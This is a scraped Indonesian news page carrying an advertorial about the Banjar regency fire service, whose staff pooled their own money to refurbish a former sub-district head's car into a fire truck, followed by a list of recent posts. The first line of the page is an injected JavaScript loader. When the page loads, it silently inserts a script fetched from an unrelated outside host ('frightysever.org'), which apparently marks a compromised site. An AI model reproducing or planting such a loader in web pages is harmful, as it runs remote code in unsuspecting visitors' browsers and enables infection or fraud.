(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Mobil Eks Camat Ini “Disulap” Jadi Armada Damkar Hasil Dana Patungan


MARTAPURA, Jajaran UPT Pemadam Kebakaran Pemkab Banjar patut diacungi jempol. Betapa tidak, untuk menyulap mobil bekas yang diserahkan menjadi mobil pemadam kebakaran, ternyata menggunakan dana patungan pejabat hingga honorer.

Dari keterangan diperoleh, di tengah krisis armada pemadam kebakaran. UPT Damkar Pemkab Banjar mendapatkan bantuan dua unit mobil bekas camat lansiran tahun 2005, kondisi fisik dan warna dasar seadanya.

Ironisnya lagi, bantuan untuk instansi di bawah Satpol PP ini, tidak disertai dengan bantuan dana dari APBD, sehingga seluruh pejabat hingga tenaga honorer UPT Damkar menyumbangkan dana patungan dari honor kegiatan.

Hasilnya, mobil bekas tersebut sudah kembali cantik dengan warna khas dan logo Damkar, yang diserahkan langsung oleh Bupati Banjar Kh Khalilurrahman kepada Kepala UPT Damkar Murjani, Rabu (28/11), usai apel HUT Korpri ke-46.

Kepedulian dan pengorbanan jajaran UPT Damkar tersebut, mendapat pujian dari orang nomor satu di Pemkab Banjar. Karena dianggap mampu bekerja dan tidak terlalu bergantung dengan APBD.

“Ini sangat bagus dan saya salut, atas kinerja UPT Damkar. Karena mobil bekas yang diserahkan Pemkab Banjar berhasil diperbaiki tanpa menggunakan dana APBD,” kata KH Khalilurrahman.

Sementara itu, Kepala UPT Damkar Pemkab Banjar Murjani, mengucapkan rasa syukur mampu menggalang kekuatan internal dalam memaksimalkan armada yang diberikan oleh pemerintah daerah.

“Alhamdulillah, kita bias menyelesaikan salah satu mobil untuk dilakukan penyerahan simbolis pada hari ini,” kata Murjani, saat dikonfirmasi mengenai sumber dana perbaikan dan pengecatan mobil, yang bersumber dari dana patungan dirinya bersama staf.

Sebelumnya, tiga unit mobil sejenis pada tahun 2014 dan 2015 juga diperbaiki sendiri oleh jajaran UPT Damkar dari sumber dana patungan. Sehingga seluruh armada Damkar Pemkab Banjar tampil fresh dan siap bertarung menangulangi kebakaran. (emroni)


Desy Arfianty

Recent Posts

KPU Banjarbaru Terima 96 Pendaftar Calon PPK

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima 96 pendaftar calon anggota Panitia… Read More

40 menit ago

Sejarah 1 Mei 1952 : Dari Afdeeling Amoentai Menjadi Kabupaten Hulu Sungai Utara

KANALKALIMANTAN.COM, AMUNTAI - Tepat hari ini Rabu 1 Mei 2024, 72 tahun silam atau tepatnya… Read More

55 menit ago

PLN Gelar Halalbihalal Bersama Anak-anak Panti Asuhan

KANALKALIMANTAN.COM, PONTIANAK - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

2 jam ago

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

14 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

15 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

16 jam ago

This website uses cookies.